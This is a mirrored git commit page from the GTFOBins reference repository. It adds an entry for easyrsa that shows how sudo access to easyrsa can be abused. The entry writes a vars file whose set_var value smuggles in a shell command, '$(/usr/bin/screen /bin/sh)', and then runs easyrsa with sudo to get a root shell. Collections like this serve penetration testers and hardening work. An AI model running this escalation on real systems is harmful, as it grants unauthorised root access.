mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 22:09:35 +01:00
Create easyrsa.md
abuses Easyrsa vars file (https://github.com/OpenVPN/easy-rsa/blob/master/doc/EasyRSA-Advanced.md)
This commit is contained in:
parent
97f46f1526
commit
72b7c317c0
9
_gtfobins/easyrsa.md
Normal file
9
_gtfobins/easyrsa.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
sudo:
|
||||
- description: The below technique utilizies `screen` to have a proper working interactive shell.
|
||||
code: |
|
||||
echo 'set_var EASYRSA "$(/usr/bin/screen /bin/sh)"' > /tmp/vars
|
||||
sudo easyrsa --vars=/tmp/vars
|
||||
export PATH=/bin:/usr/bin
|
||||
---
|
Loading…
Reference in New Issue
Block a user